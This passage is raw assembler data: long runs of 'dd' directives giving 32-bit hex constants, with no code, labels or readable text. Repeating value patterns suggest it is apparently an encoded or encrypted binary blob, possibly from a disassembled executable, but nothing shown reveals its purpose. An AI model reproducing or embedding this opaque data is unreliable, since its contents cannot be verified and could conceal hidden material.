		dd 8C28CC70h, 0A6C97C8Ah, 9B58A23Ah, 0E243CA55h, 806BD430h
		dd 0DBA894E0h, 0F0436C10h, 58B3DCEAh, 4C20C9Ah,	1E4ABE0Ah
		dd 8B7844D0h, 54929C40h, 949766E1h, 0F06E9DFh, 0FD17ECA6h
		dd 90B7A385h, 8428CD77h, 0E498896Dh, 98B1AC66h,	5F781CCBh
		dd 0C54D7FDFh, 8248FC4Dh, 1C4DE110h, 6B38EA94h,	6EFC1C10h
		dd 8BE7D640h, 0D2B3CA45h, 0B381940h, 898038C5h,	0DCD87C21h
		dd 0A448EC81h, 71FC3953h, 0D44FB912h, 9DEE5592h, 16FC93Ch
		dd 9A904BC0h, 0BBE88C35h, 8267A815h, 4E5D9310h,	0C338EABBh
		dd 3F86D90Fh, 7472BC56h, 71772EBAh, 54CEA71Eh, 0C4692409h
		dd 0D5F3EB20h, 0F06CE019h, 0B62DA357h, 0B728FA4Bh, 0CA3DBF16h
		dd 64089A6Ch, 41874B94h, 44DEB796h, 0D22C3C25h,	2036EF56h
		dd 0E0C732F2h, 4C244D4h, 0E1E7960Ah, 0E4BE174Eh, 888C5CC5h
		dd 0C1EEE423h, 0FDEB7C20h, 9D720F01h, 22846285h, 51AB970h
		dd 97BC189Ch, 107BDE23h, 40B99DE8h, 14E88C3Eh, 0E50EACF4h
		dd 0DB9B3C40h, 0A2038A15h, 5D68C9F0h, 0E7B314h,	610724F4h
		dd 54CEA07Eh, 3B95C958h, 0A1272FDFh, 0A47ED7BEh, 0D039D2EBh
		dd 8428CD58h, 0DA0DC3B7h, 9B089A6Bh, 0E2433255h, 0BF806530h
		dd 0EE58035Fh, 24A26C7Ah, 9452DCEAh, 0A84D98h, 1EDC3760h
		dd 0E8E27CD0h, 0B60758CBh, 0F03774E6h, 0FDEB7C20h, 5BB73678h
		dd 532DD1FFh, 0D628FA65h, 0BC86DB1h, 52339EC5h,	0F4BC9FC0h
		dd 1CB0D4F3h, 0B4770CA0h, 24C63310h, 9438DD80h,	4A84CF0h
		dd 7418BC60h, 0E4A0A7D0h, 54F89C40h, 973E5DB0h,	0FE2E9DFh
		dd 0FDE3ECA6h, 6178D8ACh, 47C62E8Bh, 0EDE9A96Dh, 9B5AAC66h
		dd 0E2438E55h, 106D0530h, 5C58CA9Fh, 24C86C06h,	0FF57B3CCh
		dd 76F83C85h, 1871CA09h, 0B2ED4BB5h, 318DF021h,	3B380CF1h
		dd 2E346B5h, 0FCCD6590h, 0D7B86A3Fh, 0F7498E2Ch, 99F97285h
		dd 647C835h, 0A01B79AAh, 30BED043h, 0C03B99F3h,	50BB0010h
		dd 0FA5DB0F2h, 61DA0FF0h, 327DC801h, 0A5ED40B9h, 318ADF40h
		dd 820D78D1h, 79BD1049h, 0CD389CF1h, 14F93B6Eh,	0E54DBE33h
		dd 86C85994h, 176DCF3Fh, 97785DB3h, 3089E942h, 0D93DAEC5h
		dd 70AD187Fh, 0F55DAEE8h, 76EB4C94h, 116CDD05h,	81FA4484h
		dd 17F8F821h, 0B00969C2h, 5BB72845h, 0C82D84FCh, 478A6F70h
		dd 0F758AD1Eh, 0F4EC5388h, 1061D415h, 0B10A7494h, 2E8E851h
		dd 0E03D90C9h, 70AD0179h, 0E7418FEFh, 50C52984h, 747DD109h
		dd 81ED5E96h, 269AF50Ch, 0C4117ED1h, 72AC1967h,	0E52D80F9h
		dd 7DCA2874h, 0E15CB912h, 0B3987D93h, 0D4ED835h, 0BD2B79ACh
		dd 3E8E94Ah, 0DD1E88C5h, 4D9C097Ch, 0D338B9EDh,	6BE53895h
		dd 1174C904h, 80E64D98h, 54B9F92Ch, 901C69F7h, 72A81145h
		dd 0EA2D80F9h, 55DD3161h, 0F04D8B70h, 84F559B4h, 0C7CCD00h
		dd 0B13F1C81h, 368DDA44h, 0DA3795D3h, 50AD2B10h, 0E74AB9D6h
		dd 41C62399h, 3318FD18h, 8BDE58B5h, 3195E92Ch, 0AB0E62F9h
		dd 40B91152h, 0E52683F9h, 75D71000h, 0E6418014h, 8DEA5D92h
		dd 545AC11h, 0B1114AB0h, 28EC347h, 0B43D90C9h, 4AAD1C5Fh
		dd 0F154B5C6h, 74D82DBDh, 357FD209h, 81F863D0h,	3B8ACC2Eh
		dd 0B71B69D3h, 5BAA2C20h, 0D73B89F3h, 7DFE6E33h, 845CBF02h
		dd 97F74EB0h, 577BDF35h, 0AC1D52F2h, 21BB8C44h,	0D831BAD4h
		dd 50BC2D75h, 0E15AB5F2h, 45DB2984h, 7DEF60h, 81E44596h
		dd 3195F514h, 0A1045FB0h, 67D80C45h, 0C13C9FE9h, 79D1086Dh
		dd 0C2479815h, 0A0FD5089h, 646DC139h, 0B5157295h, 2181DA40h
		dd 0F23EB3D7h, 24AD0079h, 0E04AB5D6h, 45C42D85h, 1777D00Ch
		dd 8DFA7BD0h, 3DBEF934h, 8A6869DCh, 5EBC3D54h, 0F43C9FE5h
		dd 7DCE3572h, 0E14FA91Ch, 9FF76893h, 2A08C235h,	0B10A5FB4h
		dd 28DF851h, 0B43D90C9h, 568B185Eh, 0F14CBDE5h,	67C73EA0h
		dd 746BCF05h, 96CB589Eh, 318CFD25h, 0A7077EE0h,	71AB0F45h
		dd 0D006ECE8h, 75DD2E43h, 0E17BA904h, 9BF14883h, 1046AC3Eh
		dd 0B51D6E83h, 37BDE944h, 0C6088EC5h, 57AD0F7Fh, 0E076DCF3h
		dd 52D82DBDh, 3B6FD909h, 87ED7FB6h, 3A97F534h, 8B1C42B0h
		dd 72B61950h, 0A42D80F9h, 64F7284Eh, 0F678A215h, 87FD5F8Fh
		dd 0F67F823h, 9A7872A5h, 2198C344h, 0D73DAFCEh,	4AA70564h
		dd 0C44C9280h, 61DC2382h, 1D4EC803h, 85FD58A2h,	399DD12Ch
		dd 0C4117EDFh, 4189086Eh, 0ED319EF5h, 66D73A6Eh, 0ED5CAD1Dh
		dd 9BCC528Fh, 6466C93Bh, 0A62F688Eh, 128DF859h,	0C12C8EC9h
		dd 41850071h, 0ED4AB3EDh, 68DC1EF0h, 1771D235h,	0B7ED48BFh
		dd 3A91EE34h, 850758D7h, 67B10F4Eh, 0CA219EE4h,	47EF5C67h
		dd 0E55C9F31h, 84ED4892h, 0B64CF50h, 0BB0B79B3h, 308DE753h
		dd 0DA379FA0h, 50AB097Eh, 0E05DBB80h, 70DB2398h, 1576C502h
		dd 968849BDh, 548EFF25h, 0A00669C3h, 57B70F20h,	0A43C89FBh
		dd 71CC3249h, 0F04DA202h, 87F750A3h, 0A69E435h,	0D41D70A4h
		dd 219CE279h, 0C03D92D2h, 67BC0957h, 0F156B2EFh, 60CD3893h
		dd 79C833h, 8AC12CB5h, 3A8AF934h, 0B42778D5h, 34991245h
		dd 0C13C82D9h, 60DD3272h, 0EA4DBC3Fh, 0B5F44EB5h, 1066E550h
		dd 0B1166EA5h, 258DDE44h, 0D831BAC4h, 60896C75h, 0DD689DD6h
		dd 40867EC3h, 2618F02Ch, 88CB4BB5h, 1F9DEF2Fh, 966875D5h
		dd 44971B45h, 0C10382F5h, 55C01979h, 0E34D9E70h, 86FD49B1h
		dd 869FA29h, 0AC3D79B5h, 21BA8C71h, 0C03DAFC7h,	51A40D46h
		dd 0D54099E5h, 0F29B1AF0h, 224EBE0Ah, 0E5E2F85Bh, 4C8A6312h
		dd 9CFDF3E6h, 0BFD84A1Fh, 0F21EBA54h, 64470A50h, 42BD3368h
		dd 77980ADBh, 0A656BC94h, 9DF51CC8h, 1520A7CBh,	0B458FCC8h
		dd 84E1F8h, 0FE38B683h,	57F81DF5h, 0B893B90Ah, 0B45CA780h
		dd 5B8F614h, 51975FE2h,	34EE47CEh, 5B442813h, 2283AA95h
		dd 8CEC4F70h, 80DB123h
		dd 57089A6Ah, 86787609h, 76E8BC58h, 0E59C77A0h,	74880641h
		dd 1720B6D1h, 6EFC4430h, 0E1E7EC6Eh, 0E4BE173Ah, 67D858C3h
		dd 0CBA88962h, 0EE2FBEB9h, 678ACFC8h, 0FC476F57h, 7BD733B1h
		dd 0F43DB8EFh, 0C58AC50h, 0D4787330h, 448258BBh, 0F432302Bh
		dd 34C86C78h, 0C63AB680h, 0F4C04C9Ah, 1E18BC0Fh, 0B4DB7DD0h
		dd 6F2609BFh, 9D370C86h, 0FF6E9DFh, 5BCDECA6h, 99332D74h
		dd 841ED90Ch, 61153003h, 643EBC50h, 872FCDC3h, 0C1635ECFh
		dd 0B46EC76Ah, 329E39Dh, 0BFD0DC80h, 8F57B30Fh,	42235EE5h
		dd 0CA07A1D0h, 0BCF89C68h, 3B97F3AAh, 0F16F9ABh, 2BC5ECA6h
		dd 14B87435h, 7BD7C598h, 261DB71Fh, 0E1089A6Bh,	59586800h
		dd 44C0CEBFh, 4AAC14A0h, 0A14393EFh, 940EE75Ah,	0FDC8C75h
		dd 5C5733EDh, 3B602CD0h, 0DF0763BEh, 91AB5377h,	34D87CC8h
		dd 49C9B190h, 148E4710h, 1A50543h, 0F4AE2274h, 3559F801h
		dd 2B294D90h, 72D3D6A5h, 905C7BA0h, 1FE6F9EFh, 5665DCB6h
		dd 0ECFD4CF4h, 7418BC60h, 0DB65AD8Dh, 3EF8AA5Bh, 0CEFD814Fh
		dd 64D84A3Bh, 806821C2h, 97B87600h, 434EC0B4h, 0C2836C65h
		dd 0A3286150h, 0E2634E45h, 6EE8A830h, 0DE9BA1A0h, 2D20340Ah
		dd 1938DC80h, 0FA022DB2h, 0B7E8C9A9h, 0D8C0B9B9h, 0D0FD9C76h
		dd 4D2A04B8h, 2E434B5h,	67AA1B90h, 14B8B455h, 575CC70h
		dd 0C283A50Dh, 28952750h, 57782AFCh, 44E0A84Ch,	0B4E178AFh
		dd 0C8496C10h, 9438DE88h, 5AC24A4h, 0E1E7BC60h,	0E4BE1752h
		dd 0D07560CBh, 0C4690894h, 34B22C20h, 0A448E878h, 46EA0A00h
		dd 11D79B70h, 0F4AE079Eh, 0F3856563h, 0D4781DC4h, 4682DD61h
		dd 0DC5996F1h, 64C86C10h, 0DEAD23D2h, 92A87ACBh, 2F6C4AE5h
		dd 0E0E07880h, 3F89C41h, 0E44CB84Fh, 0CBD87C22h, 9274C605h
		dd 0D43D0500h, 90CBDA04h, 9E4CB7B0h, 3359FE50h,	16EDE396h
		dd 1DE8BA0Bh, 642D3C25h, 0A5D9346h, 1938EABBh, 53FA08A7h
		dd 0F940F80Ah, 0E4892847h, 94CB3740h, 37311CDAh, 64882C8Bh
		dd 0F418BCC0h, 462DA352h, 528FA4Bh, 0F49A3424h,	407C5350h
		dd 0CEEDE3C8h, 17E8BA0Ch, 8842695Fh, 0E6956C26h, 0AAB8DC84h
		dd 42A939FAh, 616031EBh, 0FD6B2CE6h, 44F809CDh,	156B0C86h
		dd 0B00A8376h, 0BBC0E350h, 1BB85C01h, 8429DCF4h, 0CEA6BCE0h
		dd 0E44EBC25h, 50771CFEh, 44E88D31h, 0C178C220h, 1A492AE1h
		dd 0D37695D0h, 0CB230E85h, 3B19FAA6h, 8ED9E2FBh, 7AECD40h
		dd 0F87A994Fh, 0F817C16h, 7BCDE351h, 99B85C00h,	0B23644F5h
		dd 9C9856E0h, 6408AC5Ch, 41874F90h, 44DEB022h, 0B458F09Dh
		dd 9B4D6310h, 7D38DC80h, 4A84C41h, 264882E1h, 61877A99h
		dd 54F89CE5h, 6860CA33h, 0B0D7711Ch, 0A448EC09h, 0E7CD7C3Ch
		dd 8B12F0DCh, 0F498B065h, 44050150h, 0E9583CE0h, 308DEB11h
		dd 88F483D5h, 0A5B41930h, 0FC1823FEh, 75DD3884h, 41BC2E1h
		dd 91A703EAh, 0ABBF5A28h, 7E5903B0h, 34D85B30h,	5B1A0E67h
		dd 2283EE95h, 0D4E8FF70h, 1CC86CB0h, 6408AC59h,	0BA0F7384h
		dd 2089E35Ch, 96CD03A0h, 0A1C85A2Ch, 0A70EA840h, 482DC539h
		dd 25188A5Ch, 0E48A2CB8h, 2A9CDC0h, 0E2FDF3E0h,	0B9D84A1Ch
		dd 92537F05h, 0DD8B0C00h, 0D6789D24h, 61676DB1h, 643E970Ah
		dd 2B5C1847h, 72D3A2A5h, 349B04A0h, 12DD079Dh, 57C1DD80h
		dd 5C24D9Ah, 7E78F9Fh, 619DD3D4h, 67A2E880h, 77B8876Bh
		dd 8887F2Bh, 0B9FF591Dh, 0AE335C36h, 8428CD7Ch,	0F590B66Bh
		dd 9C0BAC50h, 5F18D7EBh, 254E7FFBh, 561FF9D4h, 0A7E687E5h
		dd 1F6BD347h, 0D0231B3Ch, 3472E830h, 1BE27E81h,	6F1609BFh
		dd 49E30C86h, 34EE4742h, 8F442813h, 1351DFCFh, 8442CBB7h
		dd 0BB113C08h, 2B5B6F53h, 952F4886h, 9B4C962h, 0DB2A9FC9h
		dd 50AE0363h, 0FA518BDCh, 77DF2394h, 66DFF3Ch, 90E649A2h
		dd 278AF916h, 980663D9h, 58A80465h, 0D62D9EFFh,	66D90800h
		dd 0CC5CA917h, 0F4EC4F8Fh, 3408AC52h, 0D4781CC0h, 208BFE59h
		dd 0D131868Eh, 48B84276h, 0D7719280h, 63CF6CBBh, 1772D905h
		dd 0B18241B3h, 74AAD913h, 8D2746C5h, 42FE5C6Eh,	0D13C9EF9h
		dd 1450090Ah, 0D928CC70h, 0EA02D161h, 0E1CEAC66h, 0D44E09ABh
		dd 0C27D7330h, 7558CA9Bh, 18BC73F8h, 21B3C2EAh,	49E77CEh
		dd 5A241039h, 65EE06A5h, 21E5637Eh, 86D58193h, 0BFD84A1Ch
		dd 11FEEE6h, 9135F966h,	841EFBC7h, 0C345B96Fh, 0EDF2AC66h
		dd 9AF4E686h, 455977CEh, 0E4B33342h, 0DB3344F8h, 0B0445F7Fh
		dd 40DD48F8h, 7418B488h, 0A7CE7FD0h, 18B4D86Eh,	56FDF3B0h
		dd 3FD84A1Bh, 37459850h, 0EBEB5E6Ah, 0B213F6E5h, 6748C3E0h
		dd 9BF632B8h, 0D473F43Fh, 2BB8C30h, 0E717A3E3h,	6884283Eh
		dd 6AD2380h, 0ECA87ACBh, 8BE742E3h, 1B7E2538h, 867563BFh
		dd 0F7683AA2h, 0D85DF1E9h, 0F548DAAFh, 44E90D51h, 7B799D21h
		dd 0C2A3B275h, 64034450h, 872D1CC0h, 76DBDE75h,	0F814B88Eh
		dd 0B65D9310h, 7C38EABBh, 4A84CFAh, 668CF17h, 82FC42B9h
		dd 0ABA89C01h, 0F2533625h, 765DF520h, 0AB48DAABh, 6535D131h
		dd 0D28FA69h, 0C2A47465h, 0F1F7FD50h, 0D44E2752h, 44ECE4A3h
		dd 1D5FCA0h, 24FE756Eh,	0BA8551D9h, 0ECA87ACCh,	8BE749A9h
		dd 850DEBB6h, 54F8AA5Eh, 0A7CD8FE0h, 34D84A3Eh,	0BA69791Dh
		dd 40E85C36h, 8442CD1Ah, 0F49A54B2h, 0F1F72C50h, 0D44E20F2h
		dd 31B24CB5h, 0E0D57182h, 76C85A0Eh, 21B5DAEAh,	49E5291h
		dd 2448EA34h, 71777E81h, 54CEA076h, 0EAFDF3E8h,	0F2D84A1Ch
		dd 9276A315h, 18505C00h, 0D328CC70h, 0BFDB73B3h, 20269E63h
		dd 2B78508Ch, 72D31EA5h, 0B3306FA0h, 0A9C86C10h, 0A2200935h
		dd 0B92515F0h, 742E879Eh, 1B7D6838h, 54F474BFh,	8D3F0CB0h
		dd 7196356Eh, 0E80CC2C4h, 81475C4Ch, 841EF7E2h,	7097FC65h
		dd 6408AE65h, 0D47D7453h, 0F1658C30h, 0B46EE5B3h, 3E75E149h
		dd 7C38EABCh, 0FB57B9FDh, 480601E3h, 0EB882CE6h, 54FA8CC4h
		dd 54848DB0h, 60D87C21h, 0A449EDF8h, 0EA2DA300h, 528FA4Bh
		dd 0F499AC24h, 0B083FC50h, 2B2A1CAAh, 72D492A5h, 0ED9879A0h
		dd 0ACA06165h, 6B38DC93h, 3293FE65h, 0F7FA5760h, 0D2964F6Dh
		dd 7D8D9C40h, 0DA0F893Dh, 0CB887C16h, 9274E605h, 1B78D900h
		dd 842945F4h, 0F8D8B7E0h, 54F7ACDBh, 0CA1B994Fh, 0C12E8C06h
		dd 0B46EC2EFh, 4EC80611h, 6B3AB681h, 32945A65h,	8BE03F60h
		dd 0E5E8A8DFh, 0D96B9C40h, 0F2765325h, 66C81620h, 0A2DD13C3h
		dd 91B86A3Ch, 0C4ADC3B0h, 79983CE1h, 5216D5EDh,	3C70ADC0h
		dd 0BB177673h, 0B45868C8h, 0C2E33210h, 0C01CE809h, 3F22D90Fh
		dd 0C995BC56h, 0E4BE3257h, 70109DF1h, 4997F34Ah, 2C608B5h
		dd 0CC488690h, 14B85C14h, 11D79F22h, 0F4AE00F2h, 702CE8DDh
		dd 0EB94894Dh, 4BB88C06h, 0F0D3F616h, 0C4097834h, 9572DE88h
		dd 16AA06E2h, 3013BF2Ah, 50824F4h, 5C185D4Fh, 0E02C07E1h
		dd 64EA8330h, 9818511Dh, 8505C36h, 0A128CC70h, 0D4E00ACEh
		dd 44268C7Eh, 0F15D39FAh, 6190B41Eh, 0C77DDCD8h, 6D87261Ah
		dd 0C338FCCEh, 3FEAD90Fh, 0B099BC56h, 0E4882C7Ch, 3A89C2Ah
		dd 0D6FDF3E3h, 0BFD84A1Ch, 925D681Dh, 0F7B83600h, 89E1A76Bh
		dd 0F49DD4B1h, 412EAC50h, 837816A4h, 7FAA19CFh,	70DBFC96h
		dd 2F233C1Ch, 9438DBE8h, 8915C1F0h, 23188A7Eh, 0F61DD383h
		dd 0D1F8AA7Ch, 493C7270h, 2E42C95h, 20ED6F90h, 14B86A15h
		dd 0BA6741FDh, 3AB33CD6h
		dd 3259AC3Ah, 0DAEDE393h, 0C7E8BA0Ch, 9B26FC58h, 0A936E781h
		dd 0A2048C35h, 0F6A5FCF0h, 1408C9CEh, 1B721D38h, 438AFDBFh
		dd 0B3E50553h, 0BF329721h, 2986C75Fh, 22840CBDh, 38C3F70h
		dd 0A721D717h, 580A39AFh, 69F81CF6h, 44DE995Bh,	0DC7288A1h
		dd 24C81920h, 0AF8A497Fh, 0B9284CC6h, 742E822Fh, 239958D0h
		dd 62E6FFC5h, 0C4680CB0h, 7B5DBA20h, 0A448DAAEh, 0EB4654E9h
		dd 0F0AD0B8Fh, 0F4980AF5h, 3988AC50h, 0D9781802h, 2AC8C33Ah
		dd 943693CFh, 48E80A7Fh, 0B55DBAE9h, 708803D0h,	547DD109h
		dd 87A843A4h, 369DF025h, 0A11C6DC2h, 14D27101h,	8468CCB0h
		dd 61CB7C4Fh, 0F64DA11Dh, 86F95BC0h, 4566C934h,	0B12A16CDh
		dd 3086E95Ch, 0C72B99CCh, 4CE8157Ch, 0ED48ACE1h, 60C62DD0h
		dd 460D940h, 85FC4FB5h,	74D4E82Eh, 0AA0978C3h, 53B61544h
		dd 0A965CCAAh, 60D90B0Ah, 0EA41A413h, 98F91C87h, 56C8C3Ch
		dd 0BA193CB9h, 2D86AC54h, 982C94C7h, 56A70A30h,	0FD4ABAA0h
		dd 77CC2295h, 338F540h,	0DEFC45B1h, 3CAF964Dh, 0E40D7ED5h
		dd 14BD0E41h, 883D83E9h, 7DCA3A20h, 0F74CA215h,	9BDB1CDFh
		dd 4429C93Dh, 0BD586889h, 2D9CAC43h, 947999CDh,	57EF1859h
		dd 0E059B0A0h, 80AC6D95h, 60318CA7h, 0B6C03C76h, 55ECDC77h
		dd 7680B1F0h, 0C908FF72h, 0FD1FA6ABh, 9F2166ABh, 79BA17F5h
		dd 1BA8E584h, 0A2DCC3Eh, 909BDF5h, 44E85759h, 0B458FCA0h
		dd 24C86C10h, 9438DC80h, 4A84CF0h, 7418BC60h, 0E4882CD0h
		dd 54F89C40h, 0C4680CB0h, 34D87C20h, 0A448EC90h, 14B85C00h
		dd 8428CC70h, 0F4983CE0h, 6408AC50h, 0D4781CC0h, 44E88C30h
		dd 0B458FCA0h, 24C86C10h, 9438DC80h, 87C84CF0h,	422700C5h
		dd 410B2CD0h, 54CEA380h, 87DF03B0h, 2C8BF134h, 0A2035B9Fh
		dd 50338C03h, 0C603E854h, 0CF814EECh, 707BA412h, 0FF6C5E4Bh
		dd 0D1618072h, 0B46EC31Ch, 1B08E999h, 91D3DCB6h, 0E6808E73h
		dd 70DADDB9h, 0A80DA4D0h, 0BCF8AA64h, 0C4680CD4h, 34D85C48h
		dd 0DDCD6190h, 4DB86A23h, 885CD449h, 169CFC63h,	0F88D53A7h
		dd 17782AFFh, 0C9EB55C7h, 0B46ED8ECh, 54377CF3h, 1738537Ch
		dd 0F24A4818h, 576121E9h, 0DE0B2CE6h, 7FFDE840h, 0D41A0F82h
		dd 6C2432ADh, 9ECBB2CBh, 0EBBC2800h, 7B2B2742h,	0A3702C92h
		dd 4FF753AFh, 14F5370Eh, 1CE8BA0Fh, 776CB7A3h, 1B68E99Fh
		dd 11FFDCB6h, 49E736Ch,	7418BC60h, 0E4881038h, 0C87D1740h
		dd 2C683A8Fh, 0CB278A90h, 0A448F478h, 8805DF00h, 8428FA4Fh
		dd 69113495h, 643E8FA5h, 5987802Bh, 44DEB3ACh, 14DD7363h
		dd 0ADC85A2Fh, 0A2074015h, 4ABA4F0h, 0BD2BBC60h, 641BA713h
		dd 6F89C40h, 3B96E158h,	0F44D7FDFh, 0A748DAAFh,	18C2DFD6h
		dd 83ACC370h, 77983CE1h, 6B08BC2Ah, 0D478E144h,	48AA0730h
		dd 4A9014F0h, 0A1CB93EFh, 940EE340h, 8EF88AF3h,	74E13C68h
		dd 1D0835A4h, 14FBE86Eh, 8CE3FD5Bh, 0EB39FD21h,	2597334Fh
		dd 58F418F9h, 0DDC4B970h, 0D1BF4CBh, 0D387A3AAh, 0B2781CC0h
		dd 7716F4B1h, 1FDDF392h, 72C86C10h, 0E138E603h,	14E2C7F5h
		dd 7E93BE8Bh, 0CD9DDD3h, 0AB076232h, 0FBA8B9B3h, 0B1757C16h
		dd 0ABB39450h, 14B8D884h, 449D3370h, 0A4980ADFh, 9BF6F9B8h
		dd 14FD1F3Fh, 0CBE8BA0Fh, 82673C25h, 0CC6F10h, 96F85FD3h
		dd 0B2A797C3h, 0F40A5F68h, 25DB0C19h, 7DFCB864h, 0C84128ACh
		dd 0DF982704h, 0ABB36D79h, 6065E7D7h, 2CD34D4Eh, 804352A5h
		dd 3DF32D66h, 0A087BDFBh, 92130D1Eh, 0C0F44982h, 0B733ED36h
		dd 0E0CB8469h, 7953CDEEh, 0EBE489h, 0A273ADC6h,	2019B97Fh
		dd 0F4938DBEh, 4039591Fh, 4DD1396h, 4FB86A3Fh, 7BD7BD99h
		dd 361B621Fh, 9AE74544h, 0D4BBE33Fh, 0ACB0885Ah, 4BA709F0h
		dd 2EEF998h, 2C5EDCB6h,	0E6AA54C1h, 761B58A0h, 8E234A32h
		dd 6110C446h, 4797F345h, 0E55F74E2h, 4C10E9FAh,	0EB47A928h
		dd 0F72B36F0h, 0F6C88CEBh, 522E8AD5h, 0F393B6C0h, 0EEB0E45Ah
		dd 0C15B0620h, 0CCD9DC08h, 6BC72988h, 4A84D48h,	0CA3860h
		dd 1A68FDDDh, 0BF0E778Ah, 0C468B4B5h, 0D673FC20h, 31C52F2Fh
		dd 148E6498h, 5EDF1B5Bh, 7F1DCB23h, 64089A68h, 0DB701CC0h
		dd 0A4294CA5h, 3DDD0AABh, 25C85A28h, 995EDAF5h,	17436979h
		dd 4C913996h, 918A2CE6h, 65F5FA46h, 0A26CE795h,	52FD7D2Dh
		dd 5BF4043Bh, 5733A3FFh, 30BD4544h, 5F980ADFh, 0EF8D5B93h
		dd 0D4782AF8h, 4BE08C30h, 85C3C35h, 0DB5484BAh,	1B1237Fh
		dd 49E7348h, 4C913996h,	91892CE6h, 0BFC99344h, 6FA827B2h
		dd 0BF5D8BE3h, 0A448DAA8h, 60B05C00h, 1AD4657h,	35980AD8h
		dd 696EA7B0h, 7F1E594Bh, 0CE427480h, 82607925h,	3F28AD10h
		dd 1D5CBB85h, 0C49BE7F6h, 66F31706h, 0E1074868h, 0D1723740h
		dd 0C45E3435h, 0D4192424h, 148B4788h, 7298B7FCh, 0E22827C8h
		dd 9E81D74Bh, 7DE0F454h, 5987E334h, 0A4295E34h,	3D5D9AA8h
		dd 0CF630AD0h, 3EA86C83h, 0ECF04E9Ah, 8BE74860h, 0D6FCFE54h
		dd 0BCA0942Ah, 3B97FF44h, 0F7AAB6DEh, 6EB629E4h, 0DE469574h
		dd 4ED61704h, 3E663094h, 0AEF6A024h, 2DC810B4h,	0B95841DBh
		dd 41E8354Bh, 0DC78A9FBh, 19FB1D6Bh, 3290D44Dh,	0FF9D4B60h
		dd 0E4881AE8h, 20789C40h, 6E08BCB3h, 0C53F9D7h,	0A448ECA6h
		dd 13CC5400h, 68A399C8h, 3D797E0h, 523027D5h, 0D4781FC0h
		dd 936C8331h, 458FCA0h,	0AD63C6F8h, 0A207783Dh,	0AE40FCF0h
		dd 0DCA535CBh, 13881AEFh, 62C017C5h, 0C4680FB0h, 0C3CD0820h
		dd 92706715h, 14B85C00h, 6C2DB871h, 0B67C221h, 0CFA245E0h
		dd 0EBDC994Bh, 8B638C06h, 9D1348Bh, 24FE53BCh, 2CC49409h
		dd 32572897h, 12D88FCBh, 6F0DDB7Bh, 57F8AA78h, 0B0680CB0h
		dd 0BD5D8A2Eh, 2448DAA8h, 56505974h, 3CD7338Eh,	0D2115887h
		dd 2C89FFBh, 5FFDEB6Bh,	47E8BA08h, 0C058FCA0h, 0AD4D9A45h
		dd 1438EAB8h, 1A404985h, 9CE7439Eh, 1B77D174h, 0E210BCF0h
		dd 2797F34Bh, 0CB601A19h, 35E38A85h, 9F2DD7ABh,	7328FA48h
		dd 0F75ACB32h, 1108AC50h, 2906F4D4h, 5B5873CFh,	4BA36C48h
		dd 0DB700AEFh, 593BA95h, 8F67C75Bh, 422710E5h, 6D4007D0h
		dd 0D10F6008h, 0C45E343Bh, 34D87C23h, 21BFC2E4h, 148E648Bh
		dd 8228CC70h, 716F1E94h, 643E94DBh, 0D5781CC0h,	0B6008945h
		dd 43A7035Dh, 12F0E795h, 9438DC80h, 0ECAD38F4h,	8BE7426Dh
		dd 0DC03A927h, 54FC9C76h, 0D31C0CB0h, 0CB261BC8h, 6461546Fh
		dd 0AC1394FEh, 805C0C78h, 0CED844Bh, 93A3CBBBh,	0E2409745h
		dd 44E88430h, 341789A0h, 12F0E5ADh, 0D24CDC80h,	0FB567718h
		dd 6C31049Fh, 4182E5F9h, 54CEA4C5h, 0CE6BE870h,	2E0F985h
		dd 15F84790h, 9D3DD6AAh, 2E28FA48h, 71927C50h, 643E94D5h
		dd 36C07A6Ah, 0CF6D7BCDh, 0A458CA98h, 50C86C10h, 3E716C87h
		dd 0F8DDF496h, 9CA81706h, 4F481F7Ah, 6B6821C9h,	419F0C86h
		dd 34EE44ABh, 0A448ECB0h, 4C085575h, 0BCAB497Ah, 92323CD6h
		dd 93C82DE8h, 0E2409745h, 44E8CC30h, 345B88A0h,	81C244D4h
		dd 940EE403h, 0B921E796h, 742E83F4h, 6F0DDB7Bh,	54F8AA78h
		dd 0B1280CB0h, 3688CC29h, 92706F15h, 914FF600h,	841EF4FBh
		dd 0F4983C60h, 0DCB8A725h, 0ECFC99CAh, 0AF428C06h, 85E09A9Dh
		dd 0AF4D9B08h, 9438EAB8h, 70A84CF1h, 7E310C62h,	0D2B0A875h
		dd 571C5C40h, 0FCECA9BAh, 9FBE7C16h, 54C954F6h,	2C33D9F7h
		dd 8628CC46h, 0F6ED3CE0h
		dd 0C10264E4h, 0D44E2444h, 0F9612756h, 0B46EC310h, 24E0F4A8h
		dd 11CF7780h, 49E747Bh,	7418BC68h, 0D5605DA4h, 0A30763BDh
		dd 0F2508735h, 34DC7C20h, 14439990h, 913D56B8h,	2E28FA48h
		dd 716F710Bh, 643E94DBh, 0D47814C0h, 0FC8E9D45h, 11521C23h
		dd 24FE5495h, 540B77E6h, 62BDA75Ah, 7E0095D8h, 0D2B0A975h
		dd 571C5C40h, 0FCEDA9BAh, 9FBE7C16h, 9CC36967h,	4B85C36h
		dd 3C4ECC70h, 0F7ECFC61h, 6E0068D0h, 0E2409965h, 4B43EA30h
		dd 8CD17916h, 0CC636C26h, 6BC72040h, 3C23C907h,	7418BC56h
		dd 0EDFC6CD0h, 0D1FACCF0h, 0C45E3433h, 0BF5D8B8Ah, 0A448DAA8h
		dd 0A4B85C20h, 802AB9F6h, 0AD7B1E4h, 5C8B09DAh,	59F11CF6h
		dd 44DEB3A8h, 48D857C6h, 94CF1915h, 6B775C80h, 7D40E6B0h
		dd 83E7439Ch, 0D2B0A755h, 54B89C40h, 0A2D06AB0h, 80DA0911h
		dd 14E38AB9h, 913D5618h, 4428FA48h, 1C323F00h, 9BF75004h
		dd 518F9470h, 44DEB4BBh, 0B4587CA0h, 0A2786E65h, 0ACBB790Ah
		dd 0AFCE4CC6h, 11D40E0h, 64889CD7h, 0FEB8630Fh,	3B942758h
		dd 0BF5D8BDFh, 0A448DAA8h, 61B85D00h, 8E687C7Bh, 0C2A0BF65h
		dd 6BE30650h, 14FBA4A6h, 7C6B293Ah, 1F3EFC96h, 0D3626DA0h
		dd 0A2005705h, 6A84CF0h, 8337C960h, 0D2B0A755h,	50F89C40h
		dd 747279B0h, 0B15D76E0h, 2E48DAA8h, 2280D6A5h,	94C80D70h
		dd 75FE8486h, 8F081CFBh, 0DE38ACC8h, 72D009B5h,	31AF56A0h
		dd 24FE549Bh, 9430DC80h, 0BCCE5C85h, 0D11254E3h, 0E4BE1454h
		dd 55483726h, 8CD8045Bh, 0C5CF92Ah, 53E2ECA6h, 2280D785h
